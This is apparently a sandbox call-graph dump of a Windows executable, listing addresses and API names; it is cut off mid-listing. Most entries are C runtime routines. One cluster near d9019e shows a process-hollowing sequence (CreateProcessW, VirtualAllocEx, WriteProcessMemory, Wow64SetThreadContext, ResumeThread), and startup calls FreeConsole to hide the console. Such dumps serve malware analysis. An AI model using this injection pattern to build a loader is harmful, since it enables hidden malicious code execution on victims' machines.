___free_lconv_mon 14 API calls 19776->19777 19777->19773 19778 d75ed9 19779 d75ee5 ___scrt_is_nonwritable_in_current_image 19778->19779 19791 d71d11 EnterCriticalSection 19779->19791 19781 d75eef 19782 d75c11 __Getctype 14 API calls 19781->19782 19783 d75f02 19782->19783 19792 d75f22 19783->19792 19786->19776 19790 d71d28 LeaveCriticalSection 19787->19790 19789 d75d9d 19789->19778 19790->19789 19791->19781 19795 d71d28 LeaveCriticalSection 19792->19795 19794 d75c03 19794->19743 19795->19794 19990 d725ea 19991 d725f5 19990->19991 19992 d7260a 19990->19992 19993 d71314 __strnicoll 14 API calls 19991->19993 19994 d72627 19992->19994 19995 d72612 19992->19995 19996 d725fa 19993->19996 20004 d7c336 19994->20004 19997 d71314 __strnicoll 14 API calls 19995->19997 20000 d719ff __strnicoll 29 API calls 19996->20000 20001 d72617 19997->20001 19999 d72622 20002 d72605 20000->20002 20003 d719ff __strnicoll 29 API calls 20001->20003 20003->19999 20005 d7c34a _Fputc 20004->20005 20008 d7c8df 20005->20008 20007 d7c356 _Fputc 20007->19999 20009 d7c8eb ___scrt_is_nonwritable_in_current_image 20008->20009 20010 d7c915 20009->20010 20011 d7c8f2 20009->20011 20019 d6d13f EnterCriticalSection 20010->20019 20012 d71ba8 _Fputc 29 API calls 20011->20012 20015 d7c90b 20012->20015 20014 d7c923 20020 d7c73e 20014->20020 20015->20007 20017 d7c932 20033 d7c964 20017->20033 20019->20014 20021 d7c775 20020->20021 20022 d7c74d 20020->20022 20023 d78e44 _Ungetc 29 API calls 20021->20023 20024 d71ba8 _Fputc 29 API calls 20022->20024 20025 d7c77e 20023->20025 20026 d7c768 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20024->20026 20027 d7c170 33 API calls 20025->20027 20026->20017 20028 d7c79c 20027->20028 20028->20026 20029 d7c83f 20028->20029 20030 d7c828 20028->20030 20029->20026 20032 d7c573 33 API calls 20029->20032 20031 d7c3c8 34 API calls 20030->20031 20031->20026 20032->20026 20036 d6d153 LeaveCriticalSection 20033->20036 20035 d7c96c 20035->20015 20036->20035 18144 d9019e 18145 d901d4 18144->18145 18146 d90321 GetPEB 18145->18146 18147 d90333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 18145->18147 18152 d903ca TerminateProcess 18145->18152 18146->18147 18147->18145 18148 d903da WriteProcessMemory 18147->18148 18149 d9041f 18148->18149 18150 d90461 WriteProcessMemory Wow64SetThreadContext ResumeThread 18149->18150 18151 d90424 WriteProcessMemory 18149->18151 18151->18149 18152->18145 18875 d686a0 18876 d686bb 18875->18876 18878 d686cd 18876->18878 18879 d68091 18876->18879 18882 d73a8e 18879->18882 18883 d73a9a ___scrt_is_nonwritable_in_current_image 18882->18883 18884 d73aa1 18883->18884 18885 d73ab8 18883->18885 18886 d71314 __strnicoll 14 API calls 18884->18886 18895 d6d13f EnterCriticalSection 18885->18895 18888 d73aa6 18886->18888 18890 d719ff __strnicoll 29 API calls 18888->18890 18889 d73ac7 18896 d73b0c 18889->18896 18893 d680a3 18890->18893 18892 d73ad5 18908 d73b04 18892->18908 18893->18878 18895->18889 18897 d73b22 18896->18897 18900 d73b85 _Ungetc 18896->18900 18898 d73b50 18897->18898 18897->18900 18911 d7f40f 18897->18911 18898->18900 18901 d78e44 _Ungetc 29 API calls 18898->18901 18900->18892 18902 d73b62 18901->18902 18902->18900 18903 d78e44 _Ungetc 29 API calls 18902->18903 18904 d73b6e 18903->18904 18904->18900 18905 d78e44 _Ungetc 29 API calls 18904->18905 18906 d73b7a 18905->18906 18907 d78e44 _Ungetc 29 API calls 18906->18907 18907->18900 18916 d6d153 LeaveCriticalSection 18908->18916 18910 d73b0a 18910->18893 18912 d769f4 __Getctype 14 API calls 18911->18912 18913 d7f42c 18912->18913 18914 d756b7 ___free_lconv_mon 14 API calls 18913->18914 18915 d7f436 18914->18915 18915->18898 18916->18910 20378 d687a0 20379 d687ac __EH_prolog3_GS 20378->20379 20382 d687fe 20379->20382 20383 d68818 20379->20383 20386 d687c6 20379->20386 20394 d6804d 20382->20394 20397 d7248a 20383->20397 20421 d69dbe 20386->20421 20388 d66840 std::ios_base::_Init 29 API calls 20388->20386 20389 d688d4 20389->20388 20390 d68837 20390->20389 20391 d7248a 45 API calls 20390->20391 20393 d6890e 20390->20393 20417 d67b8b 20390->20417 20391->20390 20393->20389 20424 d73927 20393->20424 20437 d72645 20394->20437 20398 d72496 ___scrt_is_nonwritable_in_current_image 20397->20398 20399 d724a0 20398->20399 20400 d724b8 20398->20400 20402 d71314 __strnicoll 14 API calls 20399->20402 20700 d6d13f EnterCriticalSection 20400->20700 20404 d724a5 20402->20404 20403 d724c3 20406 d78e44 _Ungetc 29 API calls 20403->20406 20409 d724db 20403->20409 20405 d719ff __strnicoll 29 API calls 20404->20405 20416 d724b0 20405->20416 20406->20409 20407 d72543 20410 d71314 __strnicoll 14 API calls 20407->20410 20408 d7256b 20701 d725a3 20408->20701 20409->20407 20409->20408 20412 d72548 20410->20412 20414 d719ff __strnicoll 29 API calls 20412->20414 20413 d72571 20711 d7259b 20413->20711 20414->20416 20416->20390 20418 d67bbf 20417->20418 20420 d67b9b 20417->20420 20715 d6902f 20418->20715 20420->20390 20422 d671d1 _ValidateLocalCookies 5 API calls 20421->20422 20423 d69dc8 20422->20423 20423->20423 20425 d73933 ___scrt_is_nonwritable_in_current_image 20424->20425 20426 d7394f 20425->20426 20427 d7393a 20425->20427 20726 d6d13f EnterCriticalSection 20426->20726 20428 d71314 __strnicoll 14 API calls 20427->20428 20430 d7393f 20428->20430 20432 d719ff __strnicoll 29 API calls 20430->20432 20431 d73959 20727 d7399a 20431->20727 20436 d7394a 20432->20436 20436->20393 20438 d72651 ___scrt_is_nonwritable_in_current_image 20437->20438 20439 d7266f 20438->20439 20440 d72658 20438->20440 20450 d6d13f EnterCriticalSection 20439->20450 20442 d71314 __strnicoll 14 API calls 20440->20442 20444 d7265d 20442->20444 20443 d7267b 20451 d726bc 20443->20451 20446 d719ff __strnicoll 29 API calls 20444->20446 20449 d68058 20446->20449 20449->20386 20450->20443 20452 d7273f 20451->20452 20453 d726d9 20451->20453 20455 d72806 20452->20455 20457 d78e44 _Ungetc 29 API calls 20452->20457 20454 d78e44 _Ungetc 29 API calls 20453->20454 20456 d726df 20454->20456 20487 d72686 20455->20487 20506 d7de7e 20455->20506 20460 d78e44 _Ungetc 29 API calls 20456->20460 20476 d72702 20456->20476 20458 d72754 20457->20458 20462 d78e44 _Ungetc 29 API calls 20458->20462 20479 d72777 20458->20479 20461 d726eb 20460->20461 20467 d78e44 _Ungetc 29 API calls 20461->20467 20461->20476 20465 d72760 20462->20465 20463 d7278e 20464 d725df 43 API calls 20463->20464 20466 d72797 20464->20466 20470 d78e44 _Ungetc 29 API calls 20465->20470 20465->20479 20472 d6d2bf __Getctype 48 API calls 20466->20472 20466->20487 20469 d726f7 20467->20469 20473 d78e44 _Ungetc 29 API calls 20469->20473 20474 d7276c 20470->20474 20471 d7271d 20471->20487 20491 d725df 20471->20491 20475 d727af 20472->20475 20473->20476 20477 d78e44 _Ungetc 29 API calls 20474->20477 20478 d727d9 20475->20478 20480 d725df 43 API calls 20475->20480 20476->20452 20476->20471 20477->20479 20502 d78cda 20478->20502 20479->20455 20479->20463 20482 d727c0 20480->20482 20482->20478 20484 d727c6 20482->20484 20483 d727ed 20485 d71314 __strnicoll 14 API calls 20483->20485 20483->20487 20486 d73927 31 API calls 20484->20486 20485->20487 20486->20487 20488 d726b4 20487->20488 20699 d6d153 LeaveCriticalSection 20488->20699 20490 d726ba 20490->20449 20492 d725a3 20491->20492 20493 d725c4 20492->20493 20494 d725af 20492->20494 20496 d725d3 20493->20496 20527 d7de73 20493->20527 20495 d71314 __strnicoll 14 API calls 20494->20495 20497 d725b4 20495->20497 20496->20471 20499 d719ff __strnicoll 29 API calls 20497->20499 20501 d725bf 20499->20501 20501->20471 20503 d78ced _Fputc 20502->20503 20680 d78d11 20503->20680 20505 d78cff _Fputc 20505->20483 20507 d7e018 20506->20507 20508 d7e027 20507->20508 20509 d7e03c 20507->20509 20510 d71314 __strnicoll 14 API calls 20508->20510 20513 d7e09a 20509->20513 20514 d7f40f _Ungetc 14 API calls 20509->20514 20521 d7e037 20509->20521 20511 d7e02c 20510->20511 20512 d719ff __strnicoll 29 API calls 20511->20512 20512->20521 20515 d78e44 _Ungetc 29 API calls 20513->20515 20514->20513 20516 d7e0ca 20515->20516 20517 d82d83 43 API calls 20516->20517 20518 d7e0d2 20517->20518 20519 d78e44 _Ungetc 29 API calls 20518->20519 20518->20521 20520 d7e10c 20519->20520 20520->20521 20522 d78e44 _Ungetc 29 API calls 20520->20522 20521->20487 20523 d7e11a 20522->20523 20523->20521 20524 d78e44 _Ungetc 29 API calls 20523->20524 20525 d7e128 20524->20525 20526 d78e44 _Ungetc 29 API calls 20525->20526 20526->20521 20528 d7de89 20527->20528 20529 d7de96 20528->20529 20533 d7deae 20528->20533 20530 d71314 __strnicoll 14 API calls 20529->20530 20531 d7de9b 20530->20531 20532 d719ff __strnicoll 29 API calls 20531->20532 20542 d725d0 20532->20542 20534 d7df0d 20533->20534 20535 d7f40f _Ungetc 14 API calls 20533->20535 20533->20542 20536 d78e44 _Ungetc 29 API calls 20534->20536 20535->20534 20537 d7df26 20536->20537 20548 d82d83 20537->20548 20540 d78e44 _Ungetc 29 API calls 20541 d7df5f 20540->20541 20541->20542 20543 d78e44 _Ungetc 29 API calls 20541->20543 20542->20471 20544 d7df6d 20543->20544 20544->20542 20545 d78e44 _Ungetc 29 API calls 20544->20545 20546 d7df7b 20545->20546 20547 d78e44 _Ungetc 29 API calls 20546->20547 20547->20542 20549 d82d8f ___scrt_is_nonwritable_in_current_image 20548->20549 20550 d82d97 20549->20550 20555 d82db2 20549->20555 20551 d71327 __dosmaperr 14 API calls 20550->20551 20552 d82d9c 20551->20552 20553 d71314 __strnicoll 14 API calls 20552->20553 20577 d7df2e 20553->20577 20554 d82dc9 20557 d71327 __dosmaperr 14 API calls 20554->20557 20555->20554 20556 d82e04 20555->20556 20558 d82e0d 20556->20558 20559 d82e22 20556->20559 20560 d82dce 20557->20560 20561 d71327 __dosmaperr 14 API calls 20558->20561 20578 d7d018 EnterCriticalSection 20559->20578 20563 d71314 __strnicoll 14 API calls 20560->20563 20565 d82e12 20561->20565 20564 d82dd6 20563->20564 20570 d719ff __strnicoll 29 API calls 20564->20570 20567 d71314 __strnicoll 14 API calls 20565->20567 20566 d82e28 20568 d82e5c 20566->20568 20569 d82e47 20566->20569 20567->20564 20579 d82e9c 20568->20579 20572 d71314 __strnicoll 14 API calls 20569->20572 20570->20577 20573 d82e4c 20572->20573 20575 d71327 __dosmaperr 14 API calls 20573->20575 20574 d82e57 20642 d82e94 20574->20642 20575->20574 20577->20540 20577->20542 20578->20566 20580 d82eae 20579->20580 20581 d82ec6 20579->20581 20582 d71327 __dosmaperr 14 API calls 20580->20582 20583 d83208 20581->20583 20588 d82f09 20581->20588 20584 d82eb3 20582->20584 20585 d71327 __dosmaperr 14 API calls 20583->20585 20586 d71314 __strnicoll 14 API calls 20584->20586 20587 d8320d 20585->20587 20591 d82ebb 20586->20591 20589 d71314 __strnicoll 14 API calls 20587->20589 20590 d82f14 20588->20590 20588->20591 20596 d82f44 20588->20596 20592 d82f21 20589->20592 20593 d71327 __dosmaperr 14 API calls 20590->20593 20591->20574 20597 d719ff __strnicoll 29 API calls 20592->20597 20594 d82f19 20593->20594 20595 d71314 __strnicoll 14 API calls 20594->20595 20595->20592 20598 d82f5d 20596->20598 20599 d82f98 20596->20599 20600 d82f6a 20596->20600 20597->20591 20598->20600 20604 d82f86 20598->20604 20602 d756f1 std::_Locinfo::_Locinfo_dtor 15 API calls 20599->20602 20601 d71327 __dosmaperr 14 API calls 20600->20601 20603 d82f6f 20601->20603 20605 d82fa9 20602->20605 20606 d71314 __strnicoll 14 API calls 20603->20606 20645 d801bf 20604->20645 20608 d756b7 ___free_lconv_mon 14 API calls 20605->20608 20609 d82f76 20606->20609 20611 d82fb2 20608->20611 20612 d719ff __strnicoll 29 API calls 20609->20612 20610 d830e4 20613 d83158 20610->20613 20614 d830fd GetConsoleMode 20610->20614 20615 d756b7 ___free_lconv_mon 14 API calls 20611->20615 20641 d82f81 20612->20641 20616 d8315c ReadFile 20613->20616 20614->20613 20617 d8310e 20614->20617 20618 d82fb9 20615->20618 20619 d831d0 GetLastError 20616->20619 20620 d83174 20616->20620 20617->20616 20621 d83114 ReadConsoleW 20617->20621 20622 d82fde 20618->20622 20623 d82fc3 20618->20623 20624 d831dd 20619->20624 20625 d83134 20619->20625 20620->20619 20626 d8314d 20620->20626 20621->20626 20628 d8312e GetLastError 20621->20628 20627 d7c112 31 API calls 20622->20627 20630 d71314 __strnicoll 14 API calls 20623->20630 20631 d71314 __strnicoll 14 API calls 20624->20631 20633 d7133a __dosmaperr 14 API calls 20625->20633 20625->20641 20636 d83199 20626->20636 20637 d831b0 20626->20637 20626->20641 20627->20604 20628->20625 20629 d756b7 ___free_lconv_mon 14 API calls 20629->20591 20634 d82fc8 20630->20634 20632 d831e2 20631->20632 20635 d71327 __dosmaperr 14 API calls 20632->20635 20633->20641 20638 d71327 __dosmaperr 14 API calls 20634->20638 20635->20641 20654 d832a5 20636->20654 20637->20641 20667 d83549 20637->20667 20638->20641 20641->20629 20679 d7d03b LeaveCriticalSection 20642->20679 20644 d82e9a 20644->20577 20646 d801cc 20645->20646 20647 d801d9 20645->20647 20648 d71314 __strnicoll 14 API calls 20646->20648 20649 d801e5 20647->20649 20650 d71314 __strnicoll 14 API calls 20647->20650 20651 d801d1 20648->20651 20649->20610 20652 d80206 20650->20652 20651->20610 20653 d719ff __strnicoll 29 API calls 20652->20653 20653->20651 20673 d833fc 20654->20673 20656 d7573f std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 20658 d833b9 20656->20658 20661 d833c2 GetLastError 20658->20661 20664 d832ed 20658->20664 20659 d83347 20665 d7c112 31 API calls 20659->20665 20666 d83301 20659->20666 20660 d83337 20662 d71314 __strnicoll 14 API calls 20660->20662 20663 d7133a __dosmaperr 14 API calls 20661->20663 20662->20664 20663->20664 20664->20641 20665->20666 20666->20656 20668 d83583 20667->20668 20669 d83619 ReadFile 20668->20669 20670 d83614 20668->20670 20669->20670 20671 d83636 20669->20671 20670->20641 20671->20670 20672 d7c112 31 API calls 20671->20672 20672->20670 20674 d83430 20673->20674 20675 d834a1 ReadFile 20674->20675 20676 d832bc 20674->20676 20675->20676 20677 d834ba 20675->20677 20676->20659 20676->20660 20676->20664 20676->20666 20677->20676 20678 d7c112 31 API calls 20677->20678 20678->20676 20679->20644 20681 d78d25 20680->20681 20689 d78d35 20680->20689 20682 d78d5a 20681->20682 20683 d6d5c0 _Fputc 48 API calls 20681->20683 20681->20689 20684 d78d8e 20682->20684 20685 d78d6b 20682->20685 20683->20682 20687 d78db6 20684->20687 20688 d78e0a 20684->20688 20684->20689 20692 d81d02 20685->20692 20687->20689 20691 d7573f std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 20687->20691 20690 d7573f std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 20688->20690 20689->20505 20690->20689 20691->20689 20695 d83ea3 20692->20695 20696 d83ed1 _Fputc 20695->20696 20697 d671d1 _ValidateLocalCookies 5 API calls 20696->20697 20698 d81d1d 20697->20698 20698->20689 20699->20490 20700->20403 20702 d725af 20701->20702 20705 d725c4 20701->20705 20703 d71314 __strnicoll 14 API calls 20702->20703 20706 d725b4 20703->20706 20704 d725d3 20704->20413 20705->20704 20707 d7de73 43 API calls 20705->20707 20708 d719ff __strnicoll 29 API calls 20706->20708 20709 d725d0 20707->20709 20710 d725bf 20708->20710 20709->20413 20710->20413 20714 d6d153 LeaveCriticalSection 20711->20714 20713 d725a1 20713->20416 20714->20713 20716 d690e3 20715->20716 20717 d69053 20715->20717 20719 d657b0 std::ios_base::_Init 30 API calls 20716->20719 20718 d65850 std::ios_base::_Init 5 API calls 20717->20718 20720 d69065 20718->20720 20721 d690e8 20719->20721 20722 d62b20 std::ios_base::_Init 30 API calls 20720->20722 20723 d69070 codecvt 20722->20723 20724 d690b1 codecvt 20723->20724 20725 d62350 std::ios_base::_Init 29 API calls 20723->20725 20724->20420 20725->20724 20726->20431 20728 d739b2 20727->20728 20730 d73a22 20727->20730 20729 d78e44 _Ungetc 29 API calls 20728->20729 20733 d739b8 20729->20733 20731 d7f40f _Ungetc 14 API calls 20730->20731 20732 d73967 20730->20732 20731->20732 20738 d73992 20732->20738 20733->20730 20734 d73a0a 20733->20734 20735 d71314 __strnicoll 14 API calls 20734->20735 20736 d73a0f 20735->20736 20737 d719ff __strnicoll 29 API calls 20736->20737 20737->20732 20741 d6d153 LeaveCriticalSection 20738->20741 20740 d73998 20740->20436 20741->20740 16501 d6a152 16502 d6a15e ___scrt_is_nonwritable_in_current_image 16501->16502 16527 d673ba 16502->16527 16504 d6a165 16505 d6a2be 16504->16505 16513 d6a18f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 16504->16513 16567 d69a73 IsProcessorFeaturePresent 16505->16567 16507 d6a2c5 16547 d6f179 16507->16547 16512 d6a1ae 16513->16512 16514 d6a22f 16513->16514 16550 d6f1c3 16513->16550 16538 d716ec 16514->16538 16517 d6a235 16542 d620c0 GetModuleHandleA GetProcAddress FreeConsole 16517->16542 16522 d6a25a 16523 d6a263 16522->16523 16558 d6f1a5 16522->16558 16561 d673f3 16523->16561 16528 d673c3 16527->16528 16574 d696db IsProcessorFeaturePresent 16528->16574 16532 d673d4 16533 d673d8 16532->16533 16584 d6d0a0 16532->16584 16533->16504 16536 d673ef 16536->16504 16539 d716f5 16538->16539 16541 d716fa 16538->16541 16656 d71815 16539->16656 16541->16517 17515 d620b0 16542->17515 16545 d671d1 _ValidateLocalCookies 5 API calls 16546 d62126 16545->16546 16556 d69a20 GetModuleHandleW 16546->16556 17926 d6f2c4 16547->17926 16551 d6f1d9 ___scrt_is_nonwritable_in_current_image std::_Locinfo::_Locinfo_dtor 16550->16551 16551->16514 16552 d7594a __Getctype 48 API calls 16551->16552 16555 d738fc 16552->16555 16553 d71f83 CallUnexpected 48 API calls 16554 d73926 16553->16554 16555->16553 16557 d69a2c 16556->16557 16557->16507 16557->16522 16559 d6f2c4 std::locale::_Setgloballocale 21 API calls 16558->16559 16560 d6f1b0 16559->16560 16560->16523 16562 d673ff 16561->16562 16563 d67415 16562->16563 17999 d6d0b2 16562->17999 16563->16512 16565 d6740d 16566 d6ab4e ___scrt_uninitialize_crt 7 API calls 16565->16566 16566->16563 16568 d69a89 std::locale::_Setgloballocale std::bad_exception::bad_exception 16567->16568 16569 d69b34 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16568->16569 16570 d69b78 std::locale::_Setgloballocale 16569->16570 16570->16507 16571 d6f18f 16572 d6f2c4 std::locale::_Setgloballocale 21 API calls 16571->16572 16573 d6a2d3 16572->16573 16575 d673cf 16574->16575 16576 d6ab2f 16575->16576 16593 d75386 16576->16593 16580 d6ab40 16581 d6ab4b 16580->16581 16607 d753c2 16580->16607 16581->16532 16583 d6ab38 16583->16532 16647 d77a29 16584->16647 16587 d6ab4e 16588 d6ab57 16587->16588 16589 d6ab61 16587->16589 16590 d74444 ___vcrt_uninitialize_ptd 6 API calls 16588->16590 16589->16533 16591 d6ab5c 16590->16591 16592 d753c2 ___vcrt_uninitialize_locks DeleteCriticalSection 16591->16592 16592->16589 16594 d7538f 16593->16594 16596 d753b8 16594->16596 16597 d6ab34 16594->16597 16611 d7f669 16594->16611 16598 d753c2 ___vcrt_uninitialize_locks DeleteCriticalSection 16596->16598 16597->16583 16599 d74411 16597->16599 16598->16597 16628 d7f57a 16599->16628 16604 d74441 16604->16580 16606 d74426 16606->16580 16608 d753ec 16607->16608 16609 d753cd 16607->16609 16608->16583 16610 d753d7 DeleteCriticalSection 16609->16610 16610->16608 16610->16610 16616 d7f6fb 16611->16616 16614 d7f6a1 InitializeCriticalSectionAndSpinCount 16615 d7f68c 16614->16615 16615->16594 16617 d7f683 16616->16617 16620 d7f71c 16616->16620 16617->16614 16617->16615 16618 d7f784 GetProcAddress 16618->16617 16620->16617 16620->16618 16621 d7f775 16620->16621 16623 d7f6b0 LoadLibraryExW 16620->16623 16621->16618 16622 d7f77d FreeLibrary 16621->16622 16622->16618 16624 d7f6c7 GetLastError 16623->16624 16625 d7f6f7 16623->16625 16624->16625 16626 d7f6d2 ___vcrt_FlsFree 16624->16626 16625->16620 16626->16625 16627 d7f6e8 LoadLibraryExW 16626->16627 16627->16620 16629 d7f6fb ___vcrt_FlsFree 5 API calls 16628->16629 16630 d7f594 16629->16630 16631 d7f5ad TlsAlloc 16630->16631 16632 d7441b 16630->16632 16632->16606 16633 d7f62b 16632->16633 16634 d7f6fb ___vcrt_FlsFree 5 API calls 16633->16634 16635 d7f645 16634->16635 16636 d7f660 TlsSetValue 16635->16636 16637 d74434 16635->16637 16636->16637 16637->16604 16638 d74444 16637->16638 16639 d7444e 16638->16639 16640 d74454 16638->16640 16642 d7f5b5 16639->16642 16640->16606 16643 d7f6fb ___vcrt_FlsFree 5 API calls 16642->16643 16644 d7f5cf 16643->16644 16645 d7f5e7 TlsFree 16644->16645 16646 d7f5db 16644->16646 16645->16646 16646->16640 16648 d77a39 16647->16648 16649 d673e1 16647->16649 16648->16649 16651 d77192 16648->16651 16649->16536 16649->16587 16652 d77199 16651->16652 16653 d771dc GetStdHandle 16652->16653 16654 d7723e 16652->16654 16655 d771ef GetFileType 16652->16655 16653->16652 16654->16648 16655->16652 16657 d7181e 16656->16657 16660 d71834 16656->16660 16657->16660 16662 d71756 16657->16662 16659 d7182b 16659->16660 16679 d71923 16659->16679 16660->16541 16663 d71762 16662->16663 16664 d7175f 16662->16664 16688 d77260 16663->16688 16664->16659 16669 d71773 16715 d756b7 16669->16715 16670 d7177f 16721 d71841 16670->16721 16675 d756b7 ___free_lconv_mon 14 API calls 16676 d717a3 16675->16676 16677 d756b7 ___free_lconv_mon 14 API calls 16676->16677 16678 d717a9 16677->16678 16678->16659 16684 d71994 16679->16684 16686 d71932 16679->16686 16680 d75801 WideCharToMultiByte _Fputc 16680->16686 16681 d769f4 __Getctype 14 API calls 16681->16686 16682 d71998 16683 d756b7 ___free_lconv_mon 14 API calls 16682->16683 16683->16684 16684->16660 16686->16680 16686->16681 16686->16682 16686->16684 16687 d756b7 ___free_lconv_mon 14 API calls 16686->16687 17300 d7ca45 16686->17300 16687->16686 16689 d71768 16688->16689 16690 d77269 16688->16690 16694 d7c96e GetEnvironmentStringsW 16689->16694 16743 d75a05 16690->16743 16695 d7c986 16694->16695 16696 d7176d 16694->16696 16697 d75801 _Fputc WideCharToMultiByte 16695->16697 16696->16669 16696->16670 16698 d7c9a3 16697->16698 16699 d7c9ad FreeEnvironmentStringsW 16698->16699 16700 d7c9b8 16698->16700 16699->16696 16701 d756f1 std::_Locinfo::_Locinfo_dtor 15 API calls 16700->16701 16702 d7c9bf 16701->16702 16703 d7c9c7 16702->16703 16704 d7c9d8 16702->16704 16705 d756b7 ___free_lconv_mon 14 API calls 16703->16705 16706 d75801 _Fputc WideCharToMultiByte 16704->16706 16707 d7c9cc FreeEnvironmentStringsW 16705->16707 16708 d7c9e8 16706->16708 16707->16696 16709 d7c9f7 16708->16709 16710 d7c9ef 16708->16710 16712 d756b7 ___free_lconv_mon 14 API calls 16709->16712 16711 d756b7 ___free_lconv_mon 14 API calls 16710->16711 16713 d7c9f5 FreeEnvironmentStringsW 16711->16713 16712->16713 16713->16696 16716 d756c2 RtlFreeHeap 16715->16716 16717 d71779 16715->16717 16716->16717 16718 d756d7 GetLastError 16716->16718 16717->16659 16719 d756e4 __dosmaperr 16718->16719 16720 d71314 __strnicoll 12 API calls 16719->16720 16720->16717 16722 d71856 16721->16722 16723 d769f4 __Getctype 14 API calls 16722->16723 16724 d7187d 16723->16724 16725 d71885 16724->16725 16731 d7188f 16724->16731 16726 d756b7 ___free_lconv_mon 14 API calls 16725->16726 16727 d71786 16726->16727 16727->16675 16728 d718ec 16729 d756b7 ___free_lconv_mon 14 API calls 16728->16729 16729->16727 16730 d769f4 __Getctype 14 API calls 16730->16731 16731->16728 16731->16730 16732 d718fb 16731->16732 16737 d71916 16731->16737 16739 d756b7 ___free_lconv_mon 14 API calls 16731->16739 17281 d7532c 16731->17281 17290 d717e6 16732->17290 16736 d756b7 ___free_lconv_mon 14 API calls 16738 d71908 16736->16738 17296 d71a2c IsProcessorFeaturePresent 16737->17296 16741 d756b7 ___free_lconv_mon 14 API calls 16738->16741 16739->16731 16741->16727 16742 d71922 16744 d75a10 16743->16744 16748 d75a16 16743->16748 16790 d76374 16744->16790 16749 d75a1c 16748->16749 16795 d763b3 16748->16795 16752 d75a21 16749->16752 16812 d71f83 16749->16812 16768 d77621 16752->16768 16753 d75a40 16755 d75a5d 16753->16755 16756 d75a48 16753->16756 16758 d763b3 __Getctype 6 API calls 16755->16758 16757 d763b3 __Getctype 6 API calls 16756->16757 16759 d75a54 16757->16759 16760 d75a69 16758->16760 16763 d756b7 ___free_lconv_mon 14 API calls 16759->16763 16761 d75a6d 16760->16761 16762 d75a7c 16760->16762 16764 d763b3 __Getctype 6 API calls 16761->16764 16807 d75c5c 16762->16807 16763->16749 16764->16759 16767 d756b7 ___free_lconv_mon 14 API calls 16767->16752 16769 d7764b 16768->16769 17105 d774ad 16769->17105 16774 d7767d 16776 d756b7 ___free_lconv_mon 14 API calls 16774->16776 16775 d7768b 17119 d772a8 16775->17119 16778 d77664 16776->16778 16778->16689 16780 d776c3 16781 d71314 __strnicoll 14 API calls 16780->16781 16782 d776c8 16781->16782 16784 d756b7 ___free_lconv_mon 14 API calls 16782->16784 16783 d7770a 16786 d77753 16783->16786 17130 d779dc 16783->17130 16784->16778 16785 d776de 16785->16783 16788 d756b7 ___free_lconv_mon 14 API calls 16785->16788 16787 d756b7 ___free_lconv_mon 14 API calls 16786->16787 16787->16778 16788->16783 16821 d7670d 16790->16821 16793 d763ab TlsGetValue 16794 d76399 16794->16748 16796 d7670d std::_Locinfo::_Locinfo_dtor 5 API calls 16795->16796 16797 d763cf 16796->16797 16798 d763ed TlsSetValue 16797->16798 16799 d75a30 16797->16799 16799->16749 16800 d769f4 16799->16800 16805 d76a01 __Getctype 16800->16805 16801 d76a41 16839 d71314 16801->16839 16802 d76a2c HeapAlloc 16803 d76a3f 16802->16803 16802->16805 16803->16753 16805->16801 16805->16802 16836 d6f4ab 16805->16836 16876 d75dc2 16807->16876 16978 d77ae0 16812->16978 16814 d71f9d IsProcessorFeaturePresent 16819 d71f88 16814->16819 16816 d6f18f std::locale::_Setgloballocale 21 API calls 16816->16819 16819->16812 16819->16814 16819->16816 16820 d7446c 16819->16820 16981 d77b07 16819->16981 17008 d71a60 16819->17008 17014 d7446d 16819->17014 16822 d7673d 16821->16822 16823 d76390 16821->16823 16822->16823 16828 d76642 16822->16828 16823->16793 16823->16794 16826 d76757 GetProcAddress 16826->16823 16827 d76767 std::_Locinfo::_Locinfo_dtor 16826->16827 16827->16823 16834 d76653 ___vcrt_FlsFree 16828->16834 16829 d76671 LoadLibraryExW 16831 d766f0 16829->16831 16832 d7668c GetLastError 16829->16832 16830 d766e9 16830->16823 16830->16826 16831->16830 16833 d76702 FreeLibrary 16831->16833 16832->16834 16833->16830 16834->16829 16834->16830 16835 d766bf LoadLibraryExW 16834->16835 16835->16831 16835->16834 16842 d6f4e6 16836->16842 16853 d75a9b GetLastError 16839->16853 16841 d71319 16841->16803 16843 d6f4f2 ___scrt_is_nonwritable_in_current_image 16842->16843 16848 d71d11 EnterCriticalSection 16843->16848 16845 d6f4fd std::locale::_Setgloballocale 16849 d6f534 16845->16849 16848->16845 16852 d71d28 LeaveCriticalSection 16849->16852 16851 d6f4b6 16851->16805 16852->16851 16854 d75ab1 16853->16854 16855 d75ab7 16853->16855 16857 d76374 __Getctype 6 API calls 16854->16857 16856 d763b3 __Getctype 6 API calls 16855->16856 16874 d75abb SetLastError 16855->16874 16858 d75ad3 16856->16858 16857->16855 16860 d769f4 __Getctype 12 API calls 16858->16860 16858->16874 16861 d75ae8 16860->16861 16862 d75b01 16861->16862 16863 d75af0 16861->16863 16865 d763b3 __Getctype 6 API calls 16862->16865 16864 d763b3 __Getctype 6 API calls 16863->16864 16873 d75afe 16864->16873 16866 d75b0d 16865->16866 16867 d75b11 16866->16867 16868 d75b28 16866->16868 16871 d763b3 __Getctype 6 API calls 16867->16871 16870 d75c5c __Getctype 12 API calls 16868->16870 16869 d756b7 ___free_lconv_mon 12 API calls 16869->16874 16872 d75b33 16870->16872 16871->16873 16875 d756b7 ___free_lconv_mon 12 API calls 16872->16875 16873->16869 16874->16841 16875->16874 16877 d75dce ___scrt_is_nonwritable_in_current_image 16876->16877 16890 d71d11 EnterCriticalSection 16877->16890 16879 d75dd8 16891 d75e08 16879->16891 16882 d75e14 16883 d75e20 ___scrt_is_nonwritable_in_current_image 16882->16883 16895 d71d11 EnterCriticalSection 16883->16895 16885 d75e2a 16896 d75c11 16885->16896 16887 d75e42 16900 d75e62 16887->16900 16890->16879 16894 d71d28 LeaveCriticalSection 16891->16894 16893 d75cca 16893->16882 16894->16893 16895->16885 16897 d75c20 __Getctype 16896->16897 16899 d75c47 __Getctype 16896->16899 16897->16899 16903 d79e8a 16897->16903 16899->16887 16977 d71d28 LeaveCriticalSection 16900->16977 16902 d75a87 16902->16767 16904 d79f0a 16903->16904 16907 d79ea0 16903->16907 16906 d756b7 ___free_lconv_mon 14 API calls 16904->16906 16929 